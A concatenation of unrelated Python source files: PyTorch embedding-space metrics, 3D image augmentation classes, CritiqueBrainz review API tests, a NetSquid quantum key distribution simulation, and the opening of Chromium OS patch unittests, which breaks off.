cdist = cdist * mask_1[:, :, None] * mask_2[:, None, :]
self.emb2emb_dists.append((
(cdist.mean(dim=2) / avg_correction_factor_2[:, None]).mean(dim=1) / avg_correction_factor_1).mean())
if weights_1 is not None or weights_2 is not None:
if weights_2 is not None:
weighted_cdist = (weights_2[:, None, :] * cdist).sum(dim=2) # (B x N_1)
else:
weighted_cdist = cdist.mean(dim=2) / avg_correction_factor_2[:, None] # (B x N_1)
if weights_1 is not None:
weighted_cdist = (weights_1 * weighted_cdist).sum(dim=1) # (B)
else:
weighted_cdist = cdist.mean(dim=1) / avg_correction_factor_1 # (B)
self.emb2emb_dists__weighted.append(weighted_cdist.mean())
# ----- 1NN dist -----
cdist_b2a = cdist
cdist_a2b = cdist.clone().transpose(-1, -2) # (B x N_2 x N_1)
cdist_b2a.masked_fill(~mask_2[:, None, :], float('inf')) # inf for N2 (ignore in min operation)
min_dist_b2a = cdist_b2a.min(dim=2)[0] # (B x N_1)
cdist_a2b.masked_fill(~mask_1[:, None, :], float('inf')) # inf for N1 (ignore in min operation)
min_dist_a2b = cdist_a2b.min(dim=2)[0] # (B x N_2)
self.emb2emb_1NN_2to1.append((min_dist_b2a.mean(dim=1) / avg_correction_factor_1).mean())
self.emb2emb_1NN_1to2.append((min_dist_a2b.mean(dim=1) / avg_correction_factor_2).mean())
#if weights_1 is not None:
# batch_means['b2a_emb_weighted_avg_1NN_dist'] = (weights_1 * min_dist_b2a).sum(dim=1).mean()
#if weights_2 is not None:
# batch_means['a2b_emb_weighted_avg_1NN_dist'] = (weights_2 * min_dist_a2b).sum(dim=1).mean()
# min_dist_b2a[~mask_1] = float('inf') # inf for N1 (ignore in min operation)
# batch_means['ab_emb_min_dist'] = min_dist_b2a.min(dim=1)[0].mean()
# ----- centroid assignment: avg dist to other centroid / avg dist to same centroid TODO -----
expanded_means_b2a = mean_1.unsqueeze(1).expand(B, N_2, d)
dists_b2a = F.pairwise_distance(embeddings_2.reshape(B * N_2, d), expanded_means_b2a.reshape(B * N_2, d), p=2)\
.view(B, N_2)
scores_b2a = torch.reciprocal(dists_b2a ** 2)
expanded_means_b2b = mean_2.unsqueeze(1).expand(B, N_2, d)
dists_b2b = F.pairwise_distance(embeddings_2.reshape(B * N_2, d), expanded_means_b2b.reshape(B * N_2, d), p=2) \
.view(B, N_2)
scores_b2b = torch.reciprocal(dists_b2b ** 2)
assignment_b2b = (scores_b2b / (scores_b2b + scores_b2a)) # (B x N_2)
self.assignment_2to2.append(((mask_2 * assignment_b2b).mean(dim=1) / avg_correction_factor_2).mean())
expanded_means_a2b = mean_2.unsqueeze(1).expand(B, N_1, d)
dists_a2b = F.pairwise_distance(embeddings_1.reshape(B * N_1, d), expanded_means_a2b.reshape(B * N_1, d), p=2) \
.view(B, N_1)
scores_a2b = torch.reciprocal(dists_a2b ** 2)
expanded_means_a2a = mean_1.unsqueeze(1).expand(B, N_1, d)
dists_a2a = F.pairwise_distance(embeddings_1.reshape(B * N_1, d), expanded_means_a2a.reshape(B * N_1, d), p=2) \
.view(B, N_1)
scores_a2a = torch.reciprocal(dists_a2a ** 2)
assignment_a2a = (scores_a2a / (scores_a2a + scores_a2b)) # (B x N_1)
self.assignment_1to1.append(((mask_1 * assignment_a2a).mean(dim=1) / avg_correction_factor_1).mean())
class EmbeddingMetrics(Metric):
def __init__(self, compute_cov=False):
super(EmbeddingMetrics, self).__init__(compute_on_step=False)
self.compute_cov = compute_cov
self._init()
def _init(self):
# single space metrics
self.yl_a_metrics = LocalEmbeddingSpaceMetrics('yl_a', compute_cov=self.compute_cov)
self.yl_b_metrics = LocalEmbeddingSpaceMetrics('yl_b', compute_cov=self.compute_cov)
self.zl_a_metrics = LocalEmbeddingSpaceMetrics('zl_a', compute_cov=self.compute_cov)
self.zl_b_metrics = LocalEmbeddingSpaceMetrics('zl_b', compute_cov=self.compute_cov)
self.zl_a__avg_metrics = GlobalEmbeddingSpaceMetrics('zl_a_avg', compute_cov=self.compute_cov)
self.zl_b__avg_metrics = GlobalEmbeddingSpaceMetrics('zl_b_avg', compute_cov=self.compute_cov)
self.zl_a_with_b_metrics = LocalEmbeddingSpaceMetrics('zl_a&b', compute_cov=self.compute_cov)
self.yg_a_metrics = GlobalEmbeddingSpaceMetrics('yg_a', compute_cov=self.compute_cov)
self.yg_b_metrics = GlobalEmbeddingSpaceMetrics('yg_b', compute_cov=self.compute_cov)
self.zg_a_metrics = GlobalEmbeddingSpaceMetrics('zg_a', compute_cov=self.compute_cov)
self.zg_b_metrics = GlobalEmbeddingSpaceMetrics('zg_b', compute_cov=self.compute_cov)
# two space metrics
self.zl_ab_metrics = LocalDistributionPairMetrics('zl_a||zl_b')
self.zl_ab_avg_metrics = GlobalEmbeddingPairMetrics('zl_a_avg;zl_b_avg')
# alignment metrics
self.zl_b2a_metrics = LocalEmbeddingPairMetrics('zl_a;zl_b2a')
self.zl_a2b_metrics = LocalEmbeddingPairMetrics('zl_b;zl_a2b')
self.zg_ab_metrics = GlobalEmbeddingPairMetrics('zg_a;zg_b')
def update(self, embeddings: EmbeddingsData):
embeddings = embeddings.detach().normalize()
mask_a = prepare_mask(embeddings.zl_a, embeddings.mask_a)
mask_b = prepare_mask(embeddings.zl_b, embeddings.mask_b)
self.yl_a_metrics.update(embeddings.yl_a, mask=mask_a)
self.yl_b_metrics.update(embeddings.yl_b, mask=mask_b)
mean_zl_a = self.zl_a_metrics.update(embeddings.zl_a, mask=mask_a, weights=embeddings.weights_a)
mean_zl_b = self.zl_b_metrics.update(embeddings.zl_b, mask=mask_b, weights=embeddings.weights_b)
self.zl_a__avg_metrics.update(mean_zl_a)
self.zl_b__avg_metrics.update(mean_zl_b)
if embeddings.zl_a is not None and embeddings.zl_b is not None:
self.zl_a_with_b_metrics.update(torch.cat([embeddings.zl_a, embeddings.zl_b], dim=1),
mask=torch.cat([mask_a, mask_b], dim=1))
self.yg_a_metrics.update(embeddings.yg_a)
self.yg_b_metrics.update(embeddings.yg_b)
self.zg_a_metrics.update(embeddings.zg_a)
self.zg_b_metrics.update(embeddings.zg_b)
self.zl_ab_metrics.update(embeddings.zl_a, embeddings.zl_b,
mean_1=mean_zl_a, mean_2=mean_zl_b,
mask_1=mask_a, mask_2=mask_b,
weights_1=embeddings.weights_a, weights_2=embeddings.weights_b)
self.zl_ab_avg_metrics.update(mean_zl_a, mean_zl_b)
self.zl_b2a_metrics.update(embeddings.zl_a, embeddings.zl_b2a, mask=mask_a, weights=embeddings.weights_a)
self.zl_a2b_metrics.update(embeddings.zl_b, embeddings.zl_a2b, mask=mask_b, weights=embeddings.weights_b)
self.zg_ab_metrics.update(embeddings.zg_a, embeddings.zg_b)
def compute(self):
metrics = {}
with torch.no_grad():
metrics.update(self.yl_a_metrics.compute())
metrics.update(self.yl_b_metrics.compute())
metrics.update(self.zl_a_metrics.compute())
metrics.update(self.zl_b_metrics.compute())
metrics.update(self.zl_a__avg_metrics.compute())
metrics.update(self.zl_b__avg_metrics.compute())
metrics.update(self.zl_a_with_b_metrics.compute())
metrics.update(self.yg_a_metrics.compute())
metrics.update(self.yg_b_metrics.compute())
metrics.update(self.zg_a_metrics.compute())
metrics.update(self.zg_b_metrics.compute())
metrics.update(self.zl_ab_metrics.compute())
metrics.update(self.zl_ab_avg_metrics.compute())
metrics.update(self.zl_b2a_metrics.compute())
metrics.update(self.zl_a2b_metrics.compute())
metrics.update(self.zg_ab_metrics.compute())
return metrics
def reset(self):
self._init()
class DownstreamEmbeddingMetrics(Metric):
def __init__(self, compute_cov=False):
super(DownstreamEmbeddingMetrics, self).__init__(compute_on_step=False)
self.compute_cov = compute_cov
self._init()
def _init(self):
# single space metrics
self.yl_a_metrics = LocalEmbeddingSpaceMetrics('yl_a', compute_cov=self.compute_cov)
self.yg_a_metrics = GlobalEmbeddingSpaceMetrics('yg_a', compute_cov=self.compute_cov)
def update(self, embeddings: LocalScanDownstreamEmbeddings):
embeddings = embeddings.detach().normalize()
self.yl_a_metrics.update(embeddings.yl_a, mask=prepare_mask(embeddings.yl_a, mask=None))
self.yg_a_metrics.update(embeddings.yg_a)
def compute(self):
metrics = {}
with torch.no_grad():
metrics.update(self.yl_a_metrics.compute())
metrics.update(self.yg_a_metrics.compute())
return metrics
def reset(self):
self._init()
def prepare_mask(local, mask):
if local is None:
return None
if mask is None:
B, N, _ = local.size()
mask = local.new_ones((B, N), dtype=bool)
else:
mask = mask.binary_mask
return mask
|
import numpy as np
import torch
import torch.nn as nn
class NumpyDataAugmentation:
"""
Base class for the data augmentation operations that transform
the intensity of a single image.
Transformation are applied to each channel independently.
The function per_channel_transform must be implemented.
"""
def __init__(self, proba):
# Proba to apply the transformation to a given channel of a sample
self.proba = proba
def check_data(self, array):
# The input array must be a 5D numpy array
# num channels x x_dim x y_dim x z_dim
assert len(array.shape) == 4, "Need a 4D numpy array."
def draw_parameter_in_range(self, range=(0,1)):
if range[0] == range[1]:
param = range[0]
else:
param = np.random.uniform(range[0], range[1])
return param
def per_channel_transform(self, chan_img):
# in-place transformation
raise NotImplementedError
def __call__(self, img, mask=None):
self.check_data(img)
for chan_idx in range(img.shape[0]):
# Randomly apply the transformation to each channel independently
if np.random.uniform() <= self.proba:
if mask is not None:
img[chan_idx, mask > 0] = self.per_channel_transform(
img[chan_idx, mask > 0])
else:
img[chan_idx, ...] = self.per_channel_transform(
img[chan_idx, ...])
return img
class AdditiveGaussianNoise(NumpyDataAugmentation):
def __init__(self, std_interval=(0, 0.1), proba=0.15):
"""
Additive Gaussian noise data augmentation.
The standard deviation (std) of the noise is drawn uniformly
in the interval std_interval.
Different std values are drawn for different channels.
:param std_interval:
:param proba: float; between 0 and 1.
Probability to apply the augmentation to each sample.
"""
super(AdditiveGaussianNoise, self).__init__(proba)
assert std_interval[0] <= std_interval[1]
self.std_interval = std_interval
def per_channel_transform(self, chan_img):
std = self.draw_parameter_in_range(self.std_interval)
noise = np.random.normal(0.0, std, size=chan_img.shape)
chan_img += noise
return chan_img
class Gamma(NumpyDataAugmentation):
def __init__(self, power_range=(0.7, 1.5), invert_intensities=False, proba=0.3):
super(Gamma, self).__init__(proba)
assert power_range[0] <= power_range[1]
self.power_range = power_range
self.invert_intensities = invert_intensities
def per_channel_transform(self, chan_img):
if np.random.random() < 0.5 and self.power_range[0] < 1:
range = (self.power_range[0], 1)
else:
range = (max(self.power_range[0], 1), self.power_range[1])
power = self.draw_parameter_in_range(range)
if self.invert_intensities:
chan_img *= -1
# Scale the img to [0, 1]
min_img = np.min(chan_img)
max_img = np.max(chan_img)
mean_img = np.mean(chan_img)
std_img = np.std(chan_img)
range = max_img - min_img
chan_img = (chan_img - min_img) / (range + 1e-7)
# Apply the gamma transformation
chan_img = np.power(chan_img, power)
# Rescale
chan_img = (chan_img * range) + min_img
# Preserve mean and std of the image before transformation
chan_img -= np.mean(chan_img)
chan_img *= std_img / np.std(chan_img)
chan_img += mean_img
if self.invert_intensities:
chan_img *= -1
return chan_img
class Contrast(NumpyDataAugmentation):
def __init__(self, multiplier_range=(0.75, 1.25), proba=0.15):
super(Contrast, self).__init__(proba)
assert multiplier_range[0] <= multiplier_range[1]
self.multiplier_range = multiplier_range
def per_channel_transform(self, chan_img):
multi = self.draw_parameter_in_range(self.multiplier_range)
mn = np.mean(chan_img)
min_img = np.min(chan_img)
max_img = np.max(chan_img)
# Accentuate the dispersion around the mean by factor
chan_img = (chan_img - mn) * multi + mn
# Preserve the min and max of the image before transformation
chan_img = np.clip(chan_img, a_min=min_img, a_max=max_img)
return chan_img
class MultiplicativeBrightness(NumpyDataAugmentation):
def __init__(self, multiplier_range=(0.75, 1.25), proba=0.15):
super(MultiplicativeBrightness, self).__init__(proba)
assert multiplier_range[0] <= multiplier_range[1]
self.multiplier_range = multiplier_range
def per_channel_transform(self, chan_img):
multi = self.draw_parameter_in_range(self.multiplier_range)
chan_img *= multi
return chan_img
# RandomZoom does not inherit from NumpyDataAugmentation
# because it applies to img + seg together
class RandomZoom:
def __init__(self, scale_range=(0.9, 1.1), proba=0.3):
self.proba = proba
self.scale_range = scale_range
def draw_parameter_in_range(self, range=(0,1)):
if range[0] == range[1]:
param = range[0]
else:
param = np.random.uniform(range[0], range[1])
return param
def seg_to_one_hot(self, seg):
one_hot = np.eye(seg.max() + 1)[np.squeeze(seg)].astype(np.float32)
one_hot = np.transpose(one_hot, (3, 0, 1, 2))
return one_hot
def proba_to_seg(self, seg_proba):
seg = np.argmax(seg_proba, axis=0)
seg = np.expand_dims(seg, axis=0)
return seg
def pad_if_needed(self, volume, target_shape):
shape = volume.shape
num_dim = len(shape)
need_padding = np.any(shape < target_shape)
if not need_padding:
return volume
else:
pad_list =[]
for dim in range(num_dim):
diff = target_shape[dim] - shape[dim]
if diff > 0:
margin = diff // 2
pad_dim = (margin, diff - margin)
pad_list.append(pad_dim)
else:
pad_list.append((0, 0))
padded_array = np.pad(
volume,
pad_list,
'constant',
constant_values = [(0,0)] * num_dim,
)
return padded_array
def crop_if_needed(self, volume, target_shape):
shape = volume.shape
need_cropping = np.any(shape > target_shape)
if not need_cropping:
return volume
else:
crop_param = []
for dim in range(3):
diff = shape[dim+1] - target_shape[dim+1]
if diff > 0:
margin = diff // 2
crop_param.append([margin, shape[dim+1] - (diff - margin)])
else:
crop_param.append([0, shape[dim+1]])
crop_param = np.array(crop_param)
out = volume[:, crop_param[0,0]:crop_param[0,1], crop_param[1,0]:crop_param[1,1], crop_param[2,0]:crop_param[2,1]]
return out
def fix_shape(self, volume, target_shape):
out = self.pad_if_needed(volume, target_shape)
out = self.crop_if_needed(out, target_shape)
return out
def do_zoom(self, concat_img_and_seg_np):
scale = self.draw_parameter_in_range(self.scale_range)
# Add batch dimension and convert to torch tensor
input_torch = torch.from_numpy(
np.expand_dims(concat_img_and_seg_np, axis=0)
)
if torch.cuda.is_available():
input_torch = input_torch.cuda()
out_torch = nn.functional.interpolate(
input_torch,
scale_factor=scale,
mode='trilinear',
align_corners=False,
)
out_np = out_torch.cpu().numpy()
out_np = out_np[0, ...]
return out_np
def __call__(self, img, seg):
if np.random.uniform() <= self.proba:
shape = img.shape # (n_chan, x_dim, y_dim, z_dim)
# Convert the segmentation to one hot encoding
one_hot = self.seg_to_one_hot(seg)
concat = np.concatenate([img, one_hot], axis=0)
# Apply the zoom
zoom_concat = self.do_zoom(concat)
zoom_img = zoom_concat[:shape[0], ...]
zoom_one_hot = zoom_concat[shape[0]:, ...]
zoom_seg = self.proba_to_seg(zoom_one_hot)
# Crop or pad if needed
zoom_img = self.fix_shape(zoom_img, shape)
zoom_seg = self.fix_shape(zoom_seg, shape)
zoom_img = np.copy(zoom_img, order='C').astype(np.float32)
zoom_seg = np.copy(zoom_seg, order='C').astype(np.uint8)
else:
zoom_img = img
zoom_seg = seg
return zoom_img, zoom_seg
|
<filename>critiquebrainz/ws/review/test/views_test.py
import json
import uuid
from brainzutils import cache
import critiquebrainz.db.license as db_license
import critiquebrainz.db.review as db_review
import critiquebrainz.db.users as db_users
from critiquebrainz.db.user import User
from critiquebrainz.ws.testing import WebServiceTestCase
class ReviewViewsTestCase(WebServiceTestCase):
def setUp(self):
super(ReviewViewsTestCase, self).setUp()
self.user = User(db_users.get_or_create(1, "Tester", new_user_data={
"display_name": "test user",
}))
self.another_user = User(db_users.get_or_create(2, "Hacker!", new_user_data={
"display_name": "test hacker",
}))
self.license = db_license.create(
id="CC BY-SA 3.0",
full_name="Created so we can fill the form correctly.",
)
self.review = dict(
entity_id="90878b63-f639-3c8b-aefb-190bdf3d1790",
entity_type='release_group',
user_id=self.user.id,
text="Testing! This text should be on the page.",
rating=5,
is_draft=False,
license_id=self.license["id"],
)
def header(self, user):
data = {
'Content-Type': 'application/json',
'Authorization': "Bearer " + self.create_dummy_token(user)
}
return data
def create_dummy_review(self):
return db_review.create(**self.review)
def test_review_sort(self):
response = self.client.get('/review/', query_string={'sort': 'rating'})
self.assert200(response)
response = self.client.get('/review/', query_string={'sort': 'published_on'})
self.assert200(response)
response = self.client.get('/review/', query_string={'sort': 'popularity'})
self.assert200(response)
response = self.client.get('/review/', query_string={'sort': 'created'})
self.assert200(response)
response = self.client.get('/review/', query_string={'sort': 'hello'})
self.assert400(response)
self.assertEqual(response.json['description'], 'Parameter `sort`: is not valid')
def test_review_sort_order(self):
response = self.client.get('/review/', query_string={'sort_order': 'desc'})
self.assert200(response)
response = self.client.get('/review/', query_string={'sort_order': 'asc'})
self.assert200(response)
response = self.client.get('/review/', query_string={'sort_order': 'hello'})
self.assert400(response)
self.assertEqual(response.json['description'], 'Parameter `sort_order`: is not valid')
def test_review_count(self):
resp = self.client.get('/review/').json
self.assertEqual(resp['count'], 0)
def test_review_entity(self):
review = self.create_dummy_review()
resp = self.client.get('/review/%s' % review["id"]).json
self.assertEqual(resp['review']['id'], str(review["id"]))
def test_review_delete(self):
review = self.create_dummy_review()
resp = self.client.delete('/review/%s' % review["id"], headers=self.header(self.user))
self.assert200(resp)
def test_review_type(self):
review_type_all = db_review.create(
entity_id="1b3abc15-7453-39f3-86c4-1441f360e121",
entity_type='release_group',
user_id=self.user.id,
text="Testing! This text should be on the page.",
rating=5,
is_draft=False,
license_id=self.license["id"],
)
review_only_rating = db_review.create(
entity_id="2b3abc25-7453-39f3-86c4-1441f360e121",
entity_type='release_group',
user_id=self.user.id,
rating=5,
is_draft=False,
license_id=self.license["id"],
)
review_only_review = db_review.create(
entity_id="3b3abc35-7453-39f3-86c4-1441f360e121",
entity_type='release_group',
user_id=self.user.id,
text="Testing! This text should be on the page.",
is_draft=False,
license_id=self.license["id"],
)
response = self.client.get('/review/', query_string={'review_type': 'rating'})
self.assert200(response)
actual_review_ids = [review['id'] for review in response.json['reviews']]
expected_review_ids = [str(review_type_all['id']), str(review_only_rating['id'])]
self.assertCountEqual(actual_review_ids, expected_review_ids)
response = self.client.get('/review/', query_string={'review_type': 'review'})
self.assert200(response)
actual_review_ids = [review['id'] for review in response.json['reviews']]
expected_review_ids = [str(review_type_all['id']), str(review_only_review['id'])]
self.assertCountEqual(actual_review_ids, expected_review_ids)
def test_review_large_count(self):
"""Test that retrieving reviews of a particular type correctly returns the total number of
reviews of this type in addition to the paged results"""
# 100 text reviews and 1 rating
for _ in range(100):
review = dict(
entity_id=uuid.uuid4(),
entity_type='release_group',
user_id=self.user.id,
text="Testing! This text should be on the page.",
is_draft=False,
license_id=self.license["id"],
)
db_review.create(**review)
db_review.create(
entity_id="2b3abc25-7453-39f3-86c4-1441f360e121",
entity_type='release_group',
user_id=self.user.id,
rating=5,
is_draft=False,
license_id=self.license["id"],
)
resp = self.client.get('/review/')
self.assert200(resp)
self.assertEqual(resp.json["count"], 101)
resp = self.client.get('/review/', query_string={'review_type': 'review'})
self.assert200(resp)
self.assertEqual(resp.json["count"], 100)
self.assertEqual(len(resp.json["reviews"]), 50)
def test_review_modify(self):
review = self.create_dummy_review()
resp = self.client.post('/review/%s' % review["id"], headers=self.header(self.another_user))
self.assert403(resp, "Shouldn't be able to edit someone else's review.")
# Check that a new revision is not created when review contents are not edited
data = dict()
resp = self.client.post('/review/%s' % review["id"], headers=self.header(self.user), data=json.dumps(data))
self.assert200(resp)
resp = self.client.get('/review/%s/revisions' % review["id"]).json
self.assertEqual(len(resp['revisions']), 1)
# Check if the passed parameter is modified and the other is not
data = dict(text="Some updated text with length more than twenty five.")
resp = self.client.post('/review/%s' % review["id"], headers=self.header(self.user), data=json.dumps(data))
self.assert200(resp)
resp = self.client.get('/review/%s' % review["id"]).json
self.assertEqual(resp['review']['text'], data['text'])
self.assertEqual(resp['review']['rating'], review['rating'])
def test_review_list(self):
review = self.create_dummy_review()
resp = self.client.get('/review/').json
self.assertEqual(resp['count'], 1)
self.assertEqual(len(resp['reviews']), 1)
self.assertEqual(resp['reviews'][0]['id'], str(review['id']))
# TODO(roman): Completely verify output (I encountered unicode issues when tried to do that).
def test_review_post(self):
review = dict(
entity_id=self.review['entity_id'],
entity_type='release_group',
text=self.review['text'],
rating=str(self.review['rating']),
license_choice=self.license["id"],
language='en',
is_draft=True
)
resp = self.client.post('/review/', headers=self.header(self.user), data=json.dumps(review))
self.assert200(resp)
review_2 = dict(
entity_id=self.review['entity_id'],
entity_type='release_group',
license_choice=self.license["id"],
language='en',
is_draft=True
)
resp = self.client.post('/review/', headers=self.header(self.another_user), data=json.dumps(review_2))
self.assert400(resp, "Review must have either text or rating")
# test writing a normal review works using the API. this test may not look useful but interestingly,
# writing a review using the API was broken for at least a year and no one seemed to notice or report
# it. so here it is, a test to write a valid review using the API.
review_3 = dict(
entity_id=self.review['entity_id'],
entity_type='release_group',
license_choice=self.license["id"],
language='en',
text="Hello, World! Let's write a long long long even longer the longest review........................"
)
resp = self.client.post('/review/', headers=self.header(self.another_user), data=json.dumps(review_3))
self.assert200(resp)
def test_review_vote_entity(self):
review = self.create_dummy_review()
resp = self.client.get('/review/%s/vote' % review["id"], headers=self.header(self.user))
self.assert404(resp)
def test_review_vote_put(self):
review = self.create_dummy_review()
resp = self.client.put(
'/review/%s/vote' % review["id"],
headers=self.header(self.user),
data=json.dumps({"vote": True})
)
self.assertEqual(resp.json['description'], 'You cannot rate your own review.')
resp = self.client.put(
'/review/%s/vote' % review["id"],
headers=self.header(self.another_user),
data=json.dumps({"vote": True})
)
self.assert200(resp)
resp = self.client.put(
'/review/%s/vote' % review["id"],
headers=self.header(self.another_user),
data=json.dumps({"vote": False})
)
self.assert200(resp)
# Update to review to only-rating type
db_review.update(
review_id=review["id"],
drafted=review["is_draft"],
rating=5,
is_draft=False,
)
resp = self.client.put(
'/review/%s/vote' % review["id"],
headers=self.header(self.another_user),
data=json.dumps({"vote": True})
)
self.assert400(resp, "Voting on reviews without text is not allowed.")
def test_review_vote_delete(self):
review = self.create_dummy_review()
resp = self.client.delete('/review/%s/vote' % review["id"], headers=self.header(self.another_user))
self.assert400(resp)
vote = dict(vote=True)
self.client.put('/review/%s/vote' % review["id"], headers=self.header(self.another_user), data=json.dumps(vote))
resp = self.client.delete('/review/%s/vote' % review["id"], headers=self.header(self.another_user))
self.assert200(resp)
def test_revision_entity_handler(self):
review = self.create_dummy_review()
resp = self.client.get('/review/%s/revisions/1' % review["id"])
self.assert200(resp)
data = dict(text="This is an updated review")
self.client.post('/review/%s' % review["id"], headers=self.header(self.user), data=json.dumps(data))
resp = self.client.get('/review/%s/revisions/2' % review["id"])
self.assert200(resp)
def test_cache_tracking(self):
entity_id = self.review["entity_id"]
track_key = cache.gen_key("ws_cache", entity_id)
# Test no cache if entity id is not provided
self.client.get('/review/', query_string={'sort': 'rating'})
cache_keys = cache.smembers(track_key, namespace="Review")
self.assertEqual(set(), cache_keys)
expected_cache_keys = {'list_entity_id=90878b63-f639-3c8b-aefb-190bdf3d1790_user_id=None_sort=popularity_sort_order=desc_entity_type=None_limit=50_offset=0_language=None_review_type=None',
'list_entity_id=90878b63-f639-3c8b-aefb-190bdf3d1790_user_id=None_sort=published_on_sort_order=desc_entity_type=None_limit=5_offset=0_language=None_review_type=None'}
# Test cache keys are recorded
self.client.get('/review/', query_string={'sort': 'rating', 'entity_id': entity_id})
self.client.get('/review/', query_string={'limit': 5, 'entity_id': entity_id})
cache_keys = cache.smembers(track_key, namespace="Review")
self.assertEqual(expected_cache_keys, cache_keys)
# Test no cache changes if entity_id is not available
self.client.get('/review/', query_string={'limit': 5})
cache_keys = cache.smembers(track_key, namespace="Review")
self.assertEqual(expected_cache_keys, cache_keys)
no_entity_id_key = cache.gen_key("ws_cache", None)
self.assertEqual(set(), cache.smembers(no_entity_id_key, namespace="Review"))
# Test cache invalidation upon review creation
db_review.create(**self.review)
cache_keys = cache.smembers(track_key, namespace="Review")
self.assertEqual(set(), cache_keys)
|
<reponame>stephendiadamo/qkd_error_recon
import netsquid as ns
import numpy as np
from netsquid.components import QuantumProgram, SourceStatus
from netsquid.protocols import NodeProtocol, Signals
from qkd.networks import TwoPartyNetwork
class KeyReceiverProtocol(NodeProtocol):
"""
Protocol for the receiver of the key.
"""
def __init__(self, node, key_size=10, port_names=("qubitIO", "classicIO")):
super().__init__(node)
self.node = node
self.q_port = port_names[0]
self.c_port = port_names[1]
self.key_size = key_size
self.key = None
def run(self):
# Select random bases
bases = np.random.randint(2, size=self.key_size)
results = []
qubits_received = 0
def record_measurement(msg):
results.append(msg.items[0])
def measure_qubit(message):
nonlocal qubits_received
if bases[qubits_received] == 0:
self.node.qmemory.subcomponents['qubit_detector_z'].ports['qin0'].tx_input(message)
else:
self.node.qmemory.subcomponents['qubit_detector_x'].ports['qin0'].tx_input(message)
qubits_received += 1
self.node.ports[self.q_port].bind_input_handler(measure_qubit)
self.node.qmemory.subcomponents['qubit_detector_z'].ports['cout0'].bind_output_handler(record_measurement)
self.node.qmemory.subcomponents['qubit_detector_x'].ports['cout0'].bind_output_handler(record_measurement)
# Await done signal from Alice
yield self.await_port_input(self.node.ports[self.c_port])
# All qubits sent, send bases back
self.node.ports[self.c_port].tx_output(bases[:len(results)])
# Await matched indices from Alice and process key
yield self.await_port_input(self.node.ports[self.c_port])
matched_indices = self.node.ports[self.c_port].rx_input().items
final_key = []
for i in matched_indices:
if i < len(results):
final_key.append(results[i])
self.key = final_key
self.send_signal(signal_label=Signals.SUCCESS, result=final_key)
class KeySenderProtocol(NodeProtocol):
"""
Protocol for the sender of the key.
"""
def __init__(self, node, key_size=10, port_names=("qubitIO", "classicIO")):
super().__init__(node)
self.node = node
self.q_port = port_names[0]
self.c_port = port_names[1]
self.key_size = key_size
self.key = None
def run(self):
bases = list(np.random.randint(2, size=self.key_size))
bit = 0
results = []
# Transmit encoded qubits to Bob
def record_measurement(msg):
results.append(msg.items[0])
def measure_half(message):
nonlocal bit
if bases[bit] == 0:
self.node.qmemory.subcomponents['qubit_detector_z'].ports['qin0'].tx_input(message)
else:
self.node.qmemory.subcomponents['qubit_detector_x'].ports['qin0'].tx_input(message)
bit += 1
self.node.qmemory.subcomponents['ent_source'].ports['qout0'].bind_output_handler(measure_half)
self.node.qmemory.subcomponents['qubit_detector_z'].ports['cout0'].bind_output_handler(record_measurement)
self.node.qmemory.subcomponents['qubit_detector_x'].ports['cout0'].bind_output_handler(record_measurement)
self.node.qmemory.subcomponents['ent_source'].status = SourceStatus.INTERNAL
for i in range(self.key_size):
yield self.await_port_output(self.node.qmemory.subcomponents['ent_source'].ports['qout1'])
self.node.ports[self.q_port].tx_output(
self.node.qmemory.subcomponents['ent_source'].ports['qout1'].rx_output())
self.node.qmemory.subcomponents['ent_source'].status = SourceStatus.OFF
self.node.ports[self.c_port].tx_output('DONE')
# Await response from Bob
yield self.await_port_input(self.node.ports[self.c_port])
bob_bases = self.node.ports[self.c_port].rx_input().items[0]
matched_indices = []
for i in range(len(bob_bases)):
if bob_bases[i] == bases[i]:
matched_indices.append(i)
self.node.ports[self.c_port].tx_output(matched_indices)
final_key = []
for i in matched_indices:
final_key.append(results[i])
self.key = final_key
self.send_signal(signal_label=Signals.SUCCESS, result=final_key)
if __name__ == '__main__':
n = TwoPartyNetwork('net', 0, 0, 10, t_time={'T1': 110, 'T2': 100}, loss=(0, 0)).generate_noisy_network()
node_a = n.get_node("alice")
node_b = n.get_node("bob")
p1 = KeySenderProtocol(node_a, key_size=100)
p2 = KeyReceiverProtocol(node_b, key_size=100)
p1.start()
p2.start()
# ns.logger.setLevel(4)
stats = ns.sim_run()
print(len(p1.key))
print(p1.key)
print(p2.key)
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for chromite.lib.patch."""
import copy
import itertools
import os
import shutil
import sys
import time
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(__file__)))))
from chromite.cbuildbot import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_build_lib_unittest
from chromite.lib import cros_test_lib
from chromite.lib import gerrit
from chromite.lib import git
from chromite.lib import osutils
from chromite.lib import patch as cros_patch
import mock
_GetNumber = iter(itertools.count()).next
FAKE_PATCH_JSON = {
"project":"tacos/chromite", "branch":"master",
"id":"Iee5c89d929f1850d7d4e1a4ff5f21adda800025f",
"currentPatchSet": {
"number":"2", "ref":gerrit.GetChangeRef(1112, 2),
"revision":"ff10979dd360e75ff21f5cf53b7f8647578785ef",
},
"number":"1112",
"subject":"chromite commit",
"owner":{"name":"Chromite Master", "email":"<EMAIL>"},
"url":"https://chromium-review.googlesource.com/1112",
"lastUpdated":1311024529,
"sortKey":"00166e8700001052",
"open": True,
"status":"NEW",
}
# Change-ID of a known open change in public gerrit.
GERRIT_OPEN_CHANGEID = '8366'
GERRIT_MERGED_CHANGEID = '3'
GERRIT_ABANDONED_CHANGEID = '2'
class GitRepoPatchTestCase(cros_test_lib.TempDirTestCase):
"""Helper TestCase class for writing test cases."""
# No mock bits are to be used in this class's tests.
# This needs to actually validate git output, and git behaviour, rather
# than test our assumptions about git's behaviour/output.
patch_kls = cros_patch.GitRepoPatch
COMMIT_TEMPLATE = (
"""commit abcdefgh
Author: Fake person
Date: Tue Oct 99
I am the first commit.
%(extra)s
%(change-id)s
"""
)
# Boolean controlling whether the target class natively knows its
# ChangeId; only GerritPatches do.
has_native_change_id = False
DEFAULT_TRACKING = 'refs/remotes/%s/master' % constants.EXTERNAL_REMOTE
def _CreateSourceRepo(self, path):
"""Generate a new repo with a single commit."""
tmp_path = '%s-tmp' % path
os.mkdir(path)
os.mkdir(tmp_path)
self._run(['git', 'init', '--separate-git-dir', path], cwd=tmp_path)
# Add an initial commit then wipe the working tree.
self._run(['git', 'commit', '--allow-empty', '-m', 'initial commit'],
cwd=tmp_path)
shutil.rmtree(tmp_path)
def setUp(self):
